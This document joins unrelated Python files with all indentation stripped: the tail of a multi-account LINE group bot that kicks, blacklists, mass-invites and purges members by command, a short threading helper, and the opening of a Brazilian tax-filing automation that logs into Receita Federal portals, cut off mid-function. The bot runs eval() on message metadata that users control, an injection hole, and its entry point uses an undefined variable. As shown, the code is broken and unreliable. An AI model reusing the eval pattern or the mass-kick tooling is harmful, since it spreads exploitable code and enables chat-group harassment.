for xtarg in targets:
try:
xbot.findAndAddContactsByMid(xtarg)
except:
pass
for target in targets:
try:
status["admin"].append(target)
sendMention(to,"[ Add Admin ]\nUser @! Added To Admin Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Add Admin ]\nOwner Permission")
elif hlth.startswith("del admin"):
if sender in creator or sender in owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
status["admin"].remove(target)
sendMention(to,"[ Delete Admin ]\nUser @! Deleted From Admin Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Delete Admin ]\nOwner Permission")
elif hlth.startswith("add staff"):
if sender in creator or sender in owner or sender in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for xbot in Botslist:
for xtarg in targets:
try:
xbot.findAndAddContactsByMid(xtarg)
except:
pass
for target in targets:
try:
status["staff"].append(target)
sendMention(to,"[ Add Staff ]\nUser @! Added To Staff Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Add Staff ]\nOwner/Admin Permission")
elif hlth.startswith("del staff"):
if sender in creator or sender in owner or sender in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
status["staff"].remove(target)
sendMention(to,"[ Delete Staff ]\nUser @! Deleted From Staff Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Delete Staff ]\nOwner/Admin Permission")
elif hlth.startswith("add squad"):
if sender in creator or sender in owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for xbot in Botslist:
for xtarg in targets:
try:
xbot.findAndAddContactsByMid(xtarg)
except:
pass
for target in targets:
try:
status["mybots"].append(target)
sendMention(to,"[ Add Squad ]\nUser @! Added To Squad List",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Add Squad ]\nOwner Permission")
elif hlth.startswith("del squad"):
if sender in creator or sender in owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
status["mybots"].remove(target)
sendMention(to,"[ Delete Squad ]\nUser @! Deleted From Squad List",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Delete Squad ]\nOwner Permission")
elif hlth.startswith("add ban"):
if sender in creator or sender in owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
status["blacklist"].append(target)
sendMention(to,"[ Add Blacklist ]\nUser @! Added To Blacklist User",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Add Blacklist ]\nOwner Permission")
elif hlth.startswith("del ban"):
if sender in creator or sender in owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
status["blacklist"].remove(target)
sendMention(to,"[ Delete Blacklist ]\nUser @! Deleted From Blacklist User",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Delete Blacklist ]\nOwner Permission")
elif hlth.startswith("owner:"):
if sender in creator:
spl = hlth.replace("owner:","")
if spl == "recruit":
settings["addowner"] = True
a001.sendReplyMessage(reply,receiver,"[ Add Owner ]\nPlease Send Contact To Add")
if spl == "expel":
settings["delowner"] = True
a001.sendReplyMessage(reply,receiver,"[ Delete Owner ]\nPlease Send Contact To Delete")
else:
a001.sendReplyMessage(reply,receiver,"[ Access Denied ]\nCreator Permission")
elif hlth.startswith("admin:"):
if sender in creator or sender in owner:
spl = hlth.replace("admin:","")
if spl == "recruit":
settings["addadmin"] = True
a001.sendReplyMessage(reply,receiver,"[ Add Admin ]\nPlease Send Contact To Add")
if spl == "expel":
settings["deladmin"] = True
a001.sendReplyMessage(reply,receiver,"[ Delete Admin ]\nPlease Send Contact To Delete")
else:
a001.sendReplyMessage(reply,receiver,"[ Access Denied ]\nOwner Permission")
elif hlth.startswith("staff:"):
if sender in creator or sender in owner or sender in admin:
spl = hlth.replace("staff:","")
if spl == "recruit":
settings["addstaff"] = True
a001.sendReplyMessage(reply,receiver,"[ Add Staff ]\nPlease Send Contact To Add")
if spl == "expel":
settings["delstaff"] = True
a001.sendReplyMessage(reply,receiver,"[ Delete Staff ]\nPlease Send Contact To Delete")
else:
a001.sendReplyMessage(reply,receiver,"[ Access Denied ]\nAdmin Permission")
elif hlth.startswith("squad:"):
if sender in creator or sender in owner:
spl = hlth.replace("squad:","")
if spl == "add":
settings["addbots"] = True
a001.sendReplyMessage(reply,receiver,"[ Add Squad ]\nPlease Send Contact To Add")
if spl == "del":
settings["delbots"] = True
a001.sendReplyMessage(reply,receiver,"[ Delete Squad ]\nPlease Send Contact To Delete")
else:
a001.sendReplyMessage(reply,receiver,"[ Access Denied ]\nOwner Permission")
elif hlth.startswith("ban:"):
if sender in creator or sender in owner:
spl = hlth.replace("ban:","")
if spl == "add":
settings["addban"] = True
a001.sendReplyMessage(reply,receiver,"[ Add Blacklist ]\nPlease Send Contact To Add")
if spl == "del":
settings["delban"] = True
a001.sendReplyMessage(reply,receiver,"[ Delete Blacklist ]\nPlease Send Contact To Delete")
else:
a001.sendReplyMessage(reply,receiver,"[ Access Denied ]\nOwner Permission")
elif hlth == "abort" or hlth == "eject":
if sender in creator:
settings["addadmin"] = False
settings["addban"] = False
settings["addbots"] = False
settings["addowner"] = False
settings["addstaff"] = False
settings["deladmin"] = False
settings["delban"] = False
settings["delbots"] = False
settings["delowner"] = False
settings["delstaff"] = False
a001.sendReplyMessage(reply,receiver,"Command Aborted")
elif hlth.startswith("grouplist "):
if sender in creator or sender in owner or sender in admin:
spl = hlth.replace("grouplist ","")
if spl == "1":
group = a001.getGroupIdsJoined()
getg = a001.getGroups(group)
num = 1
msgs = "┏━ Group List"
msgs += "\n┣━━━━ {}".format(resp1)
for ids in getg:
msgs += "\n┣ %i. %s" % (num, ids.name) + " (" + str(len(ids.members)) + ")"
num = (num+1)
msgs += "\n┗━ Total [ %i ] Group" % len(getg)
a001.sendReplyMessage(reply,receiver,"{}".format(str(msgs)))
if spl == "2":
group = a002.getGroupIdsJoined()
getg = a002.getGroups(group)
num = 1
msgs = "┏━ Group List"
msgs += "\n┣━━━━ {}".format(resp2)
for ids in getg:
msgs += "\n┣ %i. %s" % (num, ids.name) + " (" + str(len(ids.members)) + ")"
num = (num+1)
msgs += "\n┗━ Total [ %i ] Group" % len(getg)
a002.sendReplyMessage(reply,receiver,"{}".format(str(msgs)))
if spl == "3":
group = a003.getGroupIdsJoined()
getg = a003.getGroups(group)
num = 1
msgs = "┏━ Group List"
msgs += "\n┣━━━━ {}".format(resp3)
for ids in getg:
msgs += "\n┣ %i. %s" % (num, ids.name) + " (" + str(len(ids.members)) + ")"
num = (num+1)
msgs += "\n┗━ Total [ %i ] Group" % len(getg)
a003.sendReplyMessage(reply,receiver,"{}".format(str(msgs)))
elif hlth == "memberlist":
if sender in creator or sender in owner or sender in admin or sender in staff:
getg = a001.getGroup(receiver)
no = 1
ret = "┏━ Member List\n┣━━━━ {}".format(getg.name)
if getg.members is None:
a001.sendReplyMessage(reply,receiver,"Not Found")
else:
for i in getg.members:
ret += "\n┣ {}. {}".format(no,a001.getContact(i.mid).displayName)
no = (no+1)
ret += "\n┗━ Total [ %i ] Member" % len(getg.members)
a001.sendReplyMessage(reply,receiver,ret)
elif hlth == "pendinglist":
if sender in creator or sender in owner or sender in admin or sender in staff:
getg = a001.getGroup(receiver)
no = 1
ret = "┏━ Pending List\n┣━━━━ {}".format(getg.name)
if getg.invitee is None:
a001.sendReplyMessage(reply,receiver,"Not Found")
else:
for i in getg.invitee:
ret += "\n┣ {}. {}".format(no,a001.getContact(i.mid).displayName)
no = (no+1)
ret += "\n┗━ Total [ %i ] Pending" % len(getg.invitee)
a001.sendReplyMessage(reply,receiver,ret)
elif hlth == "protectlist":
if sender in creator or sender in owner or sender in admin or sender in staff:
ma = ""
mb = ""
a = 0
b = 0
for ls in promax:
a = a + 1
end = '\n'
ma += '┣ ' + str(a) + ". " +a001.getGroup(ls).name + "\n"
for ls in strictmode:
b = b + 1
end = '\n'
mb += '┣ ' + str(b) + ". " +a001.getGroup(ls).name + "\n"
a001.sendReplyMessage(reply, receiver, "┏━ 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ.\n┣━━━━ List Protect\n┣━━━━ Protect Max\n"+ma+"┣━━━━ Strict Mode\n"+mb+"┗━ Total [ %s ] Protection" %(str(len(promax)+len(strictmode))))
elif hlth == "purge":
if sender in creator or sender in owner:
group = a001.getGroup(receiver)
gMembMids = [contact.mid for contact in group.members]
match = []
for target in status["blacklist"]:
match+=filter(lambda str: str == target, gMembMids)
if match == []:
a001.sendReplyMessage(reply,receiver,"Nothing")
return
for fck in match:
try:
fckX = threading.Thread(target=kick, args=(receiver, fck)).start()
except:
pass
elif hlth.startswith("protect "):
if sender in creator or sender in owner or sender in admin:
spl = hlth.replace("protect ","")
if spl == "max":
if receiver in status["promax"]:
hlth = "Group Protection Max"
else:
status["promax"].append(receiver)
hlth = "Access Granted - Protection Active"
try:
group = a001.getGroup(receiver)
if group.preventedJoinByTicket == False:
progqr = a001.getGroup(receiver)
progqr.preventedJoinByTicket = True
a001.updateGroup(progqr)
settings["changeGroupName"][receiver] = group.name
settings["changeGroupPicture"][receiver] = group.pictureStatus
with open('settings.json', 'w') as fp:
json.dump(settings, fp, sort_keys=True, indent=4)
except:
pass
a001.sendReplyMessage(reply,receiver,"[ Protection ]\n" + hlth)
if spl == "none":
if receiver in status["promax"]:
status["promax"].remove(receiver)
hlth = "Access Granted - Protection Nonactive"
else:
hlth = "Group Protection None"
a001.sendReplyMessage(reply,receiver,"[ Protection ]\n" + hlth)
elif hlth.startswith("strictmode "):
if sender in creator or sender in owner or sender in admin:
spl = hlth.replace("strictmode ","")
if spl == "on":
if receiver in status["strictmode"]:
a001.sendReplyMessage(reply,receiver,"[ Strict Mode ]\nStill Active")
else:
status["strictmode"].append(receiver)
a001.sendReplyMessage(reply,receiver,"[ Strict Mode ]\nAccess Granted - Strict Mode Enable")
try:
a001.inviteIntoGroup(receiver,[M003D23])
except:
try:
a002.inviteIntoGroup(receiver,[M003D23])
except:
try:
a003.leaveGroup(receiver)
except:
pass
if spl == "off":
if receiver in status["strictmode"]:
status["strictmode"].remove(receiver)
a001.sendReplyMessage(reply,receiver,"[ Strict Mode ]\nAccess Granted - Strict Mode Disable")
try:
a003.acceptGroupInvitation(receiver)
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Strict Mode ]\nNot Active")
elif hlth.startswith("checkbot"):
if sender in creator or sender in owner or sender in admin:
try:a001.inviteIntoGroup(to, [M001D23]);has = "OK"
except:has = "NOT"
try:a001.kickoutFromGroup(to, [M001D23]);has1 = "OK"
except:has1 = "NOT"
if has == "OK":sil = "Normal"
else:sil = "Down!"
if has1 == "OK":sil1 = "Normal"
else:sil1 = "Down!"
a001.sendReplyMessage(reply, receiver, "[ Bots Status ]\n- Invite: {}\n- Kick: {}".format(sil1,sil))
try:a002.inviteIntoGroup(to, [M002D23]);has = "OK"
except:has = "NOT"
try:a002.kickoutFromGroup(to, [M002D23]);has1 = "OK"
except:has1 = "NOT"
if has == "OK":sil = "Normal"
else:sil = "Down!"
if has1 == "OK":sil1 = "Normal"
else:sil1 = "Down!"
a002.sendReplyMessage(reply, receiver, "[ Bots Status ]\n- Invite: {}\n- Kick: {}".format(sil1,sil))
try:a003.inviteIntoGroup(to, [M003D23]);has = "OK"
except:has = "NOT"
try:a003.kickoutFromGroup(to, [M003D23]);has1 = "OK"
except:has1 = "NOT"
if has == "OK":sil = "Normal"
else:sil = "Down!"
if has1 == "OK":sil1 = "Normal"
else:sil1 = "Down!"
a003.sendReplyMessage(reply, receiver, "[ Bots Status ]\n- Invite: {}\n- Kick: {}".format(sil1,sil))
elif hlth.startswith("changename:1 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 20:
dname = a001.getProfile()
dname.displayName = name
a001.updateProfile(dname)
a001.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
else:
a001.sendReplyMessage(reply,receiver,"[ Display Name ]\nAccess Limited For Owner Only")
elif hlth.startswith("changename:2 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 20:
dname = a002.getProfile()
dname.displayName = name
a002.updateProfile(dname)
a002.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
else:
a002.sendReplyMessage(reply,receiver,"[ Display Name ]\nAccess Limited For Owner Only")
elif hlth.startswith("changename:3 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 20:
dname = a003.getProfile()
dname.displayName = name
a003.updateProfile(dname)
a003.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
else:
a003.sendReplyMessage(reply,receiver,"[ Display Name ]\nAccess Limited For Owner Only")
elif hlth.startswith("changename:all "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 20:
dname1 = a001.getProfile()
dname1.displayName = name
a001.updateProfile(dname1)
a001.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
dname2 = a002.getProfile()
dname2.displayName = name
a002.updateProfile(dname2)
a002.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
dname3 = a003.getProfile()
dname3.displayName = name
a003.updateProfile(dname3)
a003.sendReplyMessage(reply,receiver,"[ Display Name ]\nDisplay Name Changed To {}".format(str(name)))
else:
for a in Botslist:
a.sendReplyMessage(reply,receiver,"[ Display Name ]\nAccess Limited For Owner Only")
elif hlth.startswith("changebio:1 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 500:
bio = a001.getProfile()
bio.statusMessage = name
a001.updateProfile(bio)
a001.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
else:
a001.sendReplyMessage(reply,receiver,"[ Status Message ]\nAccess Limited For Owner Only")
elif hlth.startswith("changebio:2 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 500:
bio = a002.getProfile()
bio.statusMessage = name
a002.updateProfile(bio)
a002.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
else:
a002.sendReplyMessage(reply,receiver,"[ Status Message ]\nAccess Limited For Owner Only")
elif hlth.startswith("changebio:3 "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 500:
bio = a003.getProfile()
bio.statusMessage = name
a003.updateProfile(bio)
a003.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
else:
a003.sendReplyMessage(reply,receiver,"[ Status Message ]\nAccess Limited For Owner Only")
elif hlth.startswith("changebio:all "):
if sender in creator or sender in owner:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
if len(name) <= 500:
bio1 = a001.getProfile()
bio1.statusMessage = name
a001.updateProfile(bio1)
a001.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
bio2 = a002.getProfile()
bio2.statusMessage = name
a002.updateProfile(bio2)
a002.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
bio3 = a003.getProfile()
bio3.statusMessage = name
a003.updateProfile(bio3)
a003.sendReplyMessage(reply,receiver,"[ Status Message ]\nStatus Message Changed To {}".format(str(name)))
else:
for a in Botslist:
a.sendReplyMessage(reply,receiver,"[ Status Message ]\nAccess Limited For Owner Only")
elif hlth.startswith("changepict:"):
if sender in creator or sender in owner:
spl = hlth.replace("changepict:","")
if spl == "1":
settings["updatePict"][M001D23] = True
a001.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nPlease Send Picture To Use")
if spl == "2":
settings["updatePict"][M002D23] = True
a002.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nPlease Send Picture To Use")
if spl == "3":
settings["updatePict"][M003D23] = True
a003.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nPlease Send Picture To Use")
if spl == "all":
settings["updatePict"][M001D23] = True
settings["updatePict"][M002D23] = True
settings["updatePict"][M003D23] = True
for a in Botslist:
a.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nPlease Send Picture To Use")
else:
a001.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nAccess Limited For Owner Only")
elif hlth.startswith("kick"):
if sender in creator or sender in owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target in creator or target in owner or target in admin or target in staff or target in Bots or target in mybots:
pass
else:
try:
d23X_72 = threading.Thread(target=kick, args=(receiver, target)).start()
except:
pass
elif hlth.startswith("invite "):
if sender in creator or sender in owner:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
try:
d23X_73 = threading.Thread(target=invite, args=(receiver, ls)).start()
except:
pass
elif hlth.startswith("invto "):
if sender in creator or sender in owner:
cond = text.split(" ")
num = int(cond[1])
gid = a001.getGroupIdsJoined()
group = a001.getGroup(gid[num-1])
a001.findAndAddContactsByMid(sender)
a001.inviteIntoGroup(gid[num-1],[sender])
a001.sendReplyMessage(reply,receiver, "Invited: "+str(group.name))
if op.type == 15 or op.type == 128:
if op.type == 15: print ("[ 15 ] NOTIFIED LEAVE GROUP")
else: print ("[ 128 ] NOTIFIED DELETE SELF FROM CHAT")
if op.param1 in status["strictmode"]:
if op.param2 == M003D23:
try:
strict = threading.Thread(target=invite, args=(op.param1, op.param2)).start()
except:
pass
backupData()
except Exception as error:
logError(error)
traceback.print_tb(error.__traceback__)
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
def run():
while True:
try:
ops = oepoll.singleTrace(count=50)
if ops != None:
for op in ops:
loop.run_until_complete(mobanzu(op))
oepoll.setRevision(op.revision)
except Exception as error:
logError(error)
# 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ. _______________________________________________________
if __name__ == '__main__':
run()
print('\n》》》》PROGRAM STARTED《《《《\n')
threading.Thread(target=loop.run_until_complete(mobanzu(op))).start()
|
util.py | from threading import Thread
def postpone(function):
def decorator(*args, **kwargs):
t = Thread(target=function, args=args, kwargs=kwargs)
t.daemon = True
t.start()
return decorator
|
rotina_pgdas.py | from time import sleep
from default.webdriver_utilities import *
from default.interact import *
from smtp_project.init_email import JsonDateWithImprove
from default.settings import SetPaths
from default.data_treatment import ExcelToData
class PgdasAnyCompt(WDShorcuts, SetPaths, ExcelToData):
def __init__(self, compt_file=None):
"""
:param compt_file: from GUI
# remember past_only arg from self.get_atual_competencia
"""
import pandas as pd
from default.webdriver_utilities.pre_drivers import pgdas_driver
from .relacao_nfs import tres_valores_faturados
# O vencimento DAS(seja pra qual for a compt) está certo, haja vista que se trata do mes atual
sh_names = 'sem_mov', 'G5_ISS', 'G5_ICMS'
if compt_file is None:
"""# Atualização, 14/01/2021"""
# self.set_compt_only() == self.set_get_compt_file(file_type=None)
# a = self.set_get_compt_file(file_type=None, m_cont=12)
# descobri como fazer..
compt_file = self.compt_and_filename()
compt, excel_file_name = compt_file
else:
compt, excel_file_name = compt_file
intelligence_existence = self.intelligence_existence_done('CERT_vs_LOGIN.xlsx')
inteligence_db = {'CLIENT': [],
'CERT x LOGIN': []
}
client_db_name = inteligence_db['CLIENT']
cert_x_login = inteligence_db['CERT x LOGIN']
cont_inteligence = -1
for sh_name in sh_names:
# agora eu posso fazer downloalds sem me preocupar tendo a variável path
mshExcelFile = pd.ExcelFile(excel_file_name)
msh = mshExcelFile.parse(sheet_name=str(sh_name))
col_str_dic = {column: str for column in list(msh)}
msh = mshExcelFile.parse(sheet_name=str(sh_name), dtype=col_str_dic)
READ = self.le_excel_each_one(msh)
self.after_READ = self.readnew_lista(READ, False)
after_READ = self.after_READ
# if sh_name not in 'sem_mov':
print(cont_inteligence)
print(f'cont inteligence plan {sh_name}')
for i, CNPJ in enumerate(after_READ['CNPJ']):
if 'G5' in sh_name:
cont_inteligence += 1
# ####################### A INTELIGENCIA EXCEL ESTÁ SEM OS SEM MOVIMENTOS NO MOMENTO
CLIENTE = after_READ['Razão Social'][i]
JA_DECLARED = after_READ['Declarado'][i].upper().strip()
CodSim = after_READ['Código Simples'][i]
CPF = after_READ['CPF'][i]
cont_ret_n_ret = i
if CLIENTE == '':
break
self.now_person = CLIENTE
self.client_path = self._files_path_v3(CLIENTE, wexplorer_tup=compt_file)
# if not existe o arquivo my_wised_check_path_file -> no momento atual, existe
def cria_inteligence():
print('Intelligence does not exist')
self.loga_cert()
# driver.set_window_position(-1055, 0)
# muda o client, no ECAC, é apenas uma função teste
element = self.intelligence_cnpj_test_element(CNPJ)
if element != '':
client_db_name.append(CLIENTE)
cert_x_login.append('loginComCodSim')
self.loga_simples(CNPJ, CPF, CodSim, CLIENTE)
print(f'Não preciso logar (if element != "") p/ criar inteligence. \n{CLIENTE}, '
f'por isso, break')
"""
print(f'PRESSIONE ENTER P/ PROSSEGUIR, {CLIENTE}')
press_key_b4('enter')
while True:
try:
driver.implicitly_wait(5)
submit = driver.find_element_by_xpath("//input[@type='submit']").click()
break
except (NoSuchElementException, ElementClickInterceptedException):
print('sleeping, line 167. Cadê o submit?')
driver.refresh()
driver.implicitly_wait(5)
# implicitly_wait -> if element was already appeared, it'll not wait.
"""
else:
client_db_name.append(CLIENTE)
cert_x_login.append('certificado')
print('SUCESSO, CERTIFICADO, ', CLIENTE)
# checa se a inteligencia não existe
try:
# driver.set_window_position(initial['x'], initial['y'])
driver.close()
# está ok o unbound me ajuda
except UnboundLocalError:
pass
if isinstance(intelligence_existence, list) and JA_DECLARED not in ['S', 'OK', 'FORA'] and cont_inteligence >= 0:
__client_path = self.client_path
self.driver = pgdas_driver(__client_path)
driver = self.driver
super().__init__(driver)
driver.implicitly_wait(2)
# initial = driver.get_window_position()
driver.get('https://www.google.com.br')
print('ecac_or_simples')
try:
ecac_or_simples = intelligence_existence[cont_inteligence][1]
except IndexError:
print('FINISH')
break
# input(intelligence_existence[cont_inteligence][0]) # -> O NOME DO CLIENTE
my_new_3valores = tres_valores_faturados(__client_path)
print(my_new_3valores, '----> my_new_3valores')
def return_valor():
if sh_names.index(sh_name) != 0:
if sh_names.index(sh_name) == 1:
if my_new_3valores:
print(my_new_3valores[0])
VALOR = [v for v in my_new_3valores[0].values()][0]
else:
VALOR = after_READ['Valor'][i]
if VALOR == '0':
# or VALOR == '':
VALOR = ''
return VALOR
else:
VALOR = after_READ['Valor'][i]
if VALOR == '0': # or VALOR == '':
VALOR = ''
return VALOR
if 'zerou' in str(VALOR).lower():
VALOR = ''
else:
if '.' not in str(VALOR):
VALOR = f'{VALOR},00'
elif VALOR != '':
VALOR = f'{float(VALOR):.2f}'
VALOR = self.trata_money_excel(VALOR)
else:
self.icms_prossegue = False # não está em uso ainda
else:
VALOR = ''
print('VALOR BEFORE RETURN', VALOR)
return VALOR
VALOR = return_valor()
# Tratei o que dá pra fazer no certificado e o que não dá
if ecac_or_simples == 'certificado':
self.loga_cert()
# loga ECAC, Insere CNPJ
self.change_ecac_client(CNPJ)
self.current_url = driver.current_url
self.opta_script() if self.m() == 12 else None
else:
self.loga_simples(CNPJ, CPF, CodSim, CLIENTE)
self.current_url = driver.current_url
self.opta_script() if self.m() == 12 else None
self.compt_typist(compt)
# faz outras declaracoes se necessarias
"""NÃO FUNCIONANDO CORRETAMENTE AINDA"""
if self.check_make_pendencies():
for compt_p2 in self.check_make_pendencies():
print(compt_p2, 'compt_p2')
self.compt_typist(compt_p2, '/'.join(driver.current_url.split('/')[:-1]))
self.DECLARA(compt_p2, sh_names.index(sh_name), '', False,
cont_ret_n_ret)
# # CRIAR NOVA PASTA, SALVAR NO LUGAR CERTO POIS NÃO TA SALVANDO ENFIM, CONFERIR O DECLARA ONDE ESTÁ SALVANDO
self.compt_typist(compt, '/'.join(driver.current_url.split('/')[:-1]))
else:
self.compt_typist(compt)
self.DECLARA(compt, sh_names.index(sh_name), VALOR, my_new_3valores, cont_ret_n_ret)
print('CLOSE DRIVE EM 5 SEGS')
sleep(5)
driver.close()
elif cont_inteligence == -1:
if JA_DECLARED not in ['S', 'OK']:
print('estou em sem movimento, vou arrumar ainda')
__client_path = self.client_path
self.driver = pgdas_driver(__client_path)
driver = self.driver
super().__init__(self.driver)
if CodSim != '-' and CodSim != '':
# Código simples existe # SEM MOVIMENTO
self.loga_simples(CNPJ, CPF, CodSim, CLIENTE)
else:
# Código sim inexistente
self.loga_cert()
self.change_ecac_client(CNPJ)
self.current_url = driver.current_url
self.opta_script() if self.m() == 12 else None
VALOR = 'zerou'
print('!!!ZEROU!!!')
self.compt_typist(compt)
# faz outras declaracoes se necessarias
if self.check_make_pendencies():
for compt_p2 in self.check_make_pendencies():
print(compt_p2, 'compt_p2')
self.compt_typist(compt_p2, '/'.join(driver.current_url.split('/')[:-1]))
self.DECLARA(compt_p2, sh_names.index(sh_name), '', False,
cont_ret_n_ret)
self.compt_typist(compt, '/'.join(driver.current_url.split('/')[:-1]))
else:
self.compt_typist(compt)
self.DECLARA(compt, sh_names.index(sh_name), VALOR, 'zerou', cont_ret_n_ret)
elif not intelligence_existence:
# se não existir vai criar.
cria_inteligence()
else:
print(f'{CLIENTE} \nJA DECLARADO: {JA_DECLARED}\n-----------------')
def loga_cert(self):
"""
:return: mixes the two functions above (show_actual_tk_window, mensagem)
"""
from threading import Thread
from pyautogui import hotkey
driver = self.driver
while True:
try:
driver.get('https://cav.receita.fazenda.gov.br/autenticacao/login')
driver.set_page_load_timeout(30)
break
except TimeoutException:
driver.refresh()
finally:
sleep(1)
activate_window('eCAC - Centro Virtual de Atendimento')
"""
while True:
try:
driver.get('https://cav.receita.fazenda.gov.br/')
driver.set_page_load_timeout(5)
break
except TimeoutException:
driver.refresh()
finally:
sleep(1)
"""
# initial = driver.find_element_by_id('caixa1-login-certificado')
driver.get(
'https://sso.acesso.gov.br/authorize?response_type=code&client_id=cav.receita.fazenda.gov.br&'
'scope=openid+govbr_recupera_certificadox509+govbr_confiabilidades&'
'redirect_uri=https://cav.receita.fazenda.gov.br/autenticacao/login/govbrsso')
initial = driver.find_element_by_link_text('Certificado digital')
print('ativando janela acima, logando certificado abaixo, linhas 270')
sleep(2)
# self.thread_pool_executor(initial.click, [hotkey, 'enter'])
t = Thread(target=initial.click)
t.start()
tt = Thread(target=sleep(2.5))
tt.start()
# B4 enter, ir pra baixo por causa do certificado do castilho
tb4 = Thread(target=hotkey('down'))
tb4.start()
tt2 = Thread(target=sleep(2))
tt2.start()
t2 = Thread(target=hotkey('enter'))
t2.start()
def intelligence_existence_done(self, file: str):
""":param file: path_file_name, excel"""
try:
compt, path_name = self.compt_and_filename()
path_name = path_name.split('/')[:-1]
path_name = '/'.join(path_name)
path_name = f'{path_name}/{file}'
path_name = path_name.replace('//', '/')
print(path_name)
inteligence_done = pd.read_excel(path_name, dtype=str)
df = inteligence_done.to_numpy().tolist()
for value in df:
# print(value)
pass
return df
except FileNotFoundError:
print('intelligence will be done')
return False
def intelligence_cnpj_test_element(self, CNPJ):
""":return: element
create_inteligence, somente
"""
driver = self.driver
def elem_with_text(elem, searched):
_tag = driver.find_element_by_xpath(f"//{elem}[contains(text(),'{searched.rstrip()}')]")
return _tag
self.tags_wait('html', 'span')
sleep(5)
# nextcl = elem_with_text("span", "Alterar perfil de acesso")
# nextcl.click()
driver.find_element_by_id('btnPerfil').click()
# altera perfil e manda o cnpj
self.tags_wait('label')
cnpj = elem_with_text("label", "Procurador de pessoa jurídica - CNPJ")
cnpj.click()
sleep(.5)
self.send_keys_anywhere(CNPJ)
sleep(1)
self.send_keys_anywhere(Keys.TAB)
self.send_keys_anywhere(Keys.ENTER)
sleep(1)
# driver.find_element_by_class_name('access-button').click()
# sleep(10)
antigo = driver.current_url
"""I GOT IT"""
# switch_to.frame...
element = driver.find_element_by_class_name('mensagemErro').text
element = element.strip()
print(element)
driver.get(
'https://sinac.cav.receita.fazenda.gov.br/simplesnacional/aplicacoes/atspo/pgdasd2018.app/')
return element
def loga_simples(self, CNPJ, CPF, CodSim, CLIENTE):
driver = self.driver
driver.get(
'https://www8.receita.fazenda.gov.br/SimplesNacional/controleAcesso/Autentica.aspx?id=60')
driver.get(
'https://www8.receita.fazenda.gov.br/SimplesNacional/controleAcesso/Autentica.aspx?id=60')
while str(driver.current_url.strip()).endswith('id=60'):
self.tags_wait('body')
self.tags_wait('html')
self.tags_wait('input')
# driver.find_elements_by_xpath("//*[contains(text(), 'CNPJ:')]")[0].click()
# pygui.hotkey('tab', interval=0.5)
cpcp = driver.find_element_by_name('ctl00$ContentPlaceHolder$txtCNPJ')
cpcp.clear()
